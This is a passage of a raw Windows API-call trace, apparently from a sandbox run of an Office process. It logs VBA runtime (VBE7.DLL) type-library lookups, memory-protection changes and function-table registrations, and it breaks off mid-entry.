ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3e20, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.603] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3e20, pBstrName=0x0, pwOrdinal=0x33e4fb3e40 | out: pBstrDllName=0x33e4fb3e20*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3e40*=0x40b0) returned 0x0 [0060.603] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3e20, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3e20, pwOrdinal=0x500000000) returned 0x0 [0060.603] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3f00, pIndex=0x0 | out: ppTLib=0x33e4fb3f00*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.603] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3f10, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3f10, pDummy=0x0) returned 0x0 [0060.603] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.603] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.603] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3f00, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.603] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3f00, pBstrName=0x0, pwOrdinal=0x33e4fb3f20 | out: pBstrDllName=0x33e4fb3f00*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3f20*=0x4190) returned 0x0 [0060.603] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3f00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3f00, pwOrdinal=0x500000000) returned 0x0 [0060.603] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3fe0, pIndex=0x0 | out: ppTLib=0x33e4fb3fe0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.603] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3ff0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3ff0, pDummy=0x0) returned 0x0 [0060.603] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.603] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.603] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3fe0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.603] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3fe0, pBstrName=0x0, pwOrdinal=0x33e4fb4000 | out: pBstrDllName=0x33e4fb3fe0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4000*=0x4270) returned 0x0 [0060.603] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3fe0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3fe0, pwOrdinal=0x500000000) returned 0x0 [0060.603] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb40c0, pIndex=0x0 | out: ppTLib=0x33e4fb40c0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.603] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb40d0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb40d0, pDummy=0x0) returned 0x0 [0060.603] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.603] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.603] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb40c0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.604] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb40c0, pBstrName=0x0, pwOrdinal=0x33e4fb40e0 | out: pBstrDllName=0x33e4fb40c0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb40e0*=0x4350) returned 0x0 [0060.604] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb40c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb40c0, pwOrdinal=0x500000000) returned 0x0 [0060.604] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb41a0, pIndex=0x0 | out: ppTLib=0x33e4fb41a0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.604] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb41b0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb41b0, pDummy=0x0) returned 0x0 [0060.604] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.604] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.604] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb41a0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.604] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb41a0, pBstrName=0x0, pwOrdinal=0x33e4fb41c0 | out: pBstrDllName=0x33e4fb41a0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb41c0*=0x4430) returned 0x0 [0060.604] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb41a0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb41a0, pwOrdinal=0x500000000) returned 0x0 [0060.604] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4280, pIndex=0x0 | out: ppTLib=0x33e4fb4280*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.604] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4290, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4290, pDummy=0x0) returned 0x0 [0060.604] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.604] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.604] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4280, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.604] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4280, pBstrName=0x0, pwOrdinal=0x33e4fb42a0 | out: pBstrDllName=0x33e4fb4280*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42a0*=0x4510) returned 0x0 [0060.604] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4280, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4280, pwOrdinal=0x500000000) returned 0x0 [0060.604] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4360, pIndex=0x0 | out: ppTLib=0x33e4fb4360*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.604] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4370, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4370, pDummy=0x0) returned 0x0 [0060.604] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.604] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.604] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4360, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.604] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4360, pBstrName=0x0, pwOrdinal=0x33e4fb4380 | out: pBstrDllName=0x33e4fb4360*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4380*=0x45f0) returned 0x0 [0060.605] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4360, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4360, pwOrdinal=0x500000000) returned 0x0 [0060.605] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4440, pIndex=0x0 | out: ppTLib=0x33e4fb4440*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.605] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4450, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4450, pDummy=0x0) returned 0x0 [0060.605] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.605] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.605] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4440, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.605] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4440, pBstrName=0x0, pwOrdinal=0x33e4fb4460 | out: pBstrDllName=0x33e4fb4440*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4460*=0x46d0) returned 0x0 [0060.605] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4440, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4440, pwOrdinal=0x500000000) returned 0x0 [0060.605] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4520, pIndex=0x0 | out: ppTLib=0x33e4fb4520*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.605] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4530, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4530, pDummy=0x0) returned 0x0 [0060.605] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.605] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.605] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4520, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.605] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4520, pBstrName=0x0, pwOrdinal=0x33e4fb4540 | out: pBstrDllName=0x33e4fb4520*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4540*=0x47b0) returned 0x0 [0060.605] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4520, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4520, pwOrdinal=0x500000000) returned 0x0 [0060.605] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d5068, ppTLib=0x33e4fb46a0, pIndex=0x0 | out: ppTLib=0x33e4fb46a0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.605] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb46b0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb46b0, pDummy=0x0) returned 0x0 [0060.605] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.605] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.605] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0xe4fb46a0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.605] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb46a0, pBstrName=0x0, pwOrdinal=0x33e4fb46c0 | out: pBstrDllName=0x33e4fb46a0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb46c0*=0x4930) returned 0x0 [0060.605] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb46a0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb46a0, pwOrdinal=0x500000000) returned 0x0 [0060.605] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39dbc8430, cb=0x1810) returned 0x1d39dbc8430 [0060.606] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39dbc8430, cb=0x162e) returned 0x1d39dbc8430 [0060.606] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbe9550) [0060.606] GetCurrentProcess () returned 0xffffffffffffffff [0060.606] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8af7d9, dwSize=0x8) returned 1 [0060.606] GetCurrentProcess () returned 0xffffffffffffffff [0060.606] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8af7d8, dwSize=0x8) returned 1 [0060.606] GetCurrentProcess () returned 0xffffffffffffffff [0060.606] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8af7d9, dwSize=0x8) returned 1 [0060.606] GetCurrentProcess () returned 0xffffffffffffffff [0060.606] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8af7d8, dwSize=0x8) returned 1 [0060.606] GetCurrentProcess () returned 0xffffffffffffffff [0060.606] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8af7e8, dwSize=0x2) returned 1 [0060.606] GetCurrentProcess () returned 0xffffffffffffffff [0060.606] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8af83c, dwSize=0x45) returned 1 [0060.606] VirtualProtect (in: lpAddress=0x1d39d8af83c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x33e4fb4a1c | out: lpflOldProtect=0x33e4fb4a1c*=0x40) returned 1 [0060.607] GetCurrentProcess () returned 0xffffffffffffffff [0060.607] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8b11fc, dwSize=0x45) returned 1 [0060.607] VirtualProtect (in: lpAddress=0x1d39d8b11fc, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x33e4fb4a1c | out: lpflOldProtect=0x33e4fb4a1c*=0x40) returned 1 [0060.608] SetErrorMode (uMode=0x8001) returned 0x8001 [0060.608] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0060.608] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7ffce0820000 [0060.609] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a3000001ca) returned 1 [0060.609] SetErrorMode (uMode=0x8001) returned 0x8001 [0060.609] GetProcAddress (hModule=0x7ffce0820000, lpProcName=0x2cc) returned 0x7ffce0b668d8 [0060.610] GetCurrentProcess () returned 0xffffffffffffffff [0060.610] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8b07ac, dwSize=0x4b) returned 1 [0060.610] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b07ac, ImageBase=0x33e4fb48a8, HistoryTable=0x33e4fb48b0 | out: ImageBase=0x33e4fb48a8, HistoryTable=0x33e4fb48b0) returned 0x0 [0060.610] VirtualProtect (in: lpAddress=0x1d39d8b07ac, dwSize=0x4c, flNewProtect=0x40, lpflOldProtect=0x33e4fb49ac | out: lpflOldProtect=0x33e4fb49ac*=0x4) returned 1 [0060.610] RtlAddFunctionTable (FunctionTable=0x1d39d8b0804, EntryCount=0x1, BaseAddress=0x1d39d8b0700, TargetGp=0x40) returned 1 [0060.613] GetCurrentProcess () returned 0xffffffffffffffff [0060.613] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8b1464, dwSize=0x4c) returned 1 [0060.613] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b1464, ImageBase=0x33e4fb4908, HistoryTable=0x33e4fb4910 | out: ImageBase=0x33e4fb4908, HistoryTable=0x33e4fb4910) returned 0x0 [0060.613] VirtualProtect (in: lpAddress=0x1d39d8b1464, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x33e4fb4a0c | out: lpflOldProtect=0x33e4fb4a0c*=0x40) returned 1 [0060.613] RtlAddFunctionTable (FunctionTable=0x1d39d8b14c0, EntryCount=0x1, BaseAddress=0x1d39d8b1400, TargetGp=0x40) returned 1 [0060.615] GetCurrentProcess () returned 0xffffffffffffffff [0060.615] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8b1508, dwSize=0x5c) returned 1 [0060.615] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b1508, ImageBase=0x33e4fb4908, HistoryTable=0x33e4fb4910 | out: ImageBase=0x33e4fb4908, HistoryTable=0x33e4fb4910) returned 0x0 [0060.615] VirtualProtect (in: lpAddress=0x1d39d8b1508, dwSize=0x60, flNewProtect=0x40, lpflOldProtect=0x33e4fb4a0c | out: lpflOldProtect=0x33e4fb4a0c*=0x40) returned 1 [0060.616] RtlAddFunctionTable (FunctionTable=0x1d39d8b1574, EntryCount=0x1, BaseAddress=0x1d39d8b1400, TargetGp=0x40) returned 1 [0060.618] GetCurrentProcess () returned 0xffffffffffffffff [0060.618] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39dbc6b7c, dwSize=0x4c) returned 1 [0060.618] RtlLookupFunctionEntry (in: ControlPc=0x1d39dbc6b7c, ImageBase=0x33e4fb4908, HistoryTable=0x33e4fb4910 | out: ImageBase=0x33e4fb4908, HistoryTable=0x33e4fb4910) returned 0x0 [0060.618] VirtualProtect (in: lpAddress=0x1d39dbc6b7c, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x33e4fb4a0c | out: lpflOldProtect=0x33e4fb4a0c*=0x4) returned 1 [0060.619] RtlAddFunctionTable (FunctionTable=0x1d39dbc6bd8, EntryCount=0x1, BaseAddress=0x1d39dbc6b00, TargetGp=0x40) returned 1 [0060.621] GetCurrentProcess () returned 0xffffffffffffffff [0060.621] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39dbc6c34, dwSize=0x4c) returned 1 [0060.621] RtlLookupFunctionEntry (in: ControlPc=0x1d39dbc6c34, ImageBase=0x33e4fb4908, HistoryTable=0x33e4fb4910 | out: ImageBase=0x33e4fb4908, HistoryTable=0x33e4fb4910) returned 0x0 [0060.621] VirtualProtect (in: lpAddress=0x1d39dbc6c34, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x33e4fb4a0c | out: lpflOldProtect=0x33e4fb4a0c*=0x40) returned 1 [0060.622] RtlAddFunctionTable (FunctionTable=0x1d39dbc6c90, EntryCount=0x1, BaseAddress=0x1d39dbc6c00, TargetGp=0x40) returned 1 [0060.624] SetErrorMode (uMode=0x8001) returned 0x8001 [0060.624] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0060.624] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7ffce0820000 [0060.625] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a3000001cb) returned 1 [0060.625] SetErrorMode (uMode=0x8001) returned 0x8001 [0060.625] GetProcAddress (hModule=0x7ffce0820000, lpProcName=0x260) returned 0x7ffce097098c [0060.625] GetCurrentProcess () returned 0xffffffffffffffff [0060.625] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39dbc5df4, dwSize=0x43) returned 1 [0060.625] RtlLookupFunctionEntry (in: ControlPc=0x1d39dbc5df4, ImageBase=0x33e4fb48a8, HistoryTable=0x33e4fb48b0 | out: ImageBase=0x33e4fb48a8, HistoryTable=0x33e4fb48b0) returned 0x0 [0060.625] VirtualProtect (in: lpAddress=0x1d39dbc5df4, dwSize=0x44, flNewProtect=0x40, lpflOldProtect=0x33e4fb49ac | out: lpflOldProtect=0x33e4fb49ac*=0x4) returned 1 [0060.626] RtlAddFunctionTable (FunctionTable=0x1d39dbc5e44, EntryCount=0x1, BaseAddress=0x1d39dbc5d00, TargetGp=0x40) returned 1 [0060.630] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x9 [0060.630] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd8 | out: ppvObject=0x33e4fb5dd8*=0x0) returned 0x80004002 [0060.630] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd0 | out: ppvObject=0x33e4fb5dd0*=0x0) returned 0x80004002 [0060.630] IUnknown:Release (This=0x1d39d552bc8) returned 0x8 [0060.630] IUnknown:AddRef (This=0x1d39d9d5068) returned 0x3 [0060.630] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd8 | out: ppvObject=0x33e4fb5dd8*=0x0) returned 0x80004002 [0060.630] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd0 | out: ppvObject=0x33e4fb5dd0*=0x0) returned 0x80004002 [0060.630] IUnknown:Release (This=0x1d39d9d5068) returned 0x2 [0060.630] IUnknown:AddRef (This=0x1d39d552cd0) returned 0x4 [0060.630] IUnknown:QueryInterface (in: This=0x1d39d552cd0, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd8 | out: ppvObject=0x33e4fb5dd8*=0x0) returned 0x80004002 [0060.630] IUnknown:QueryInterface (in: This=0x1d39d552cd0, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, 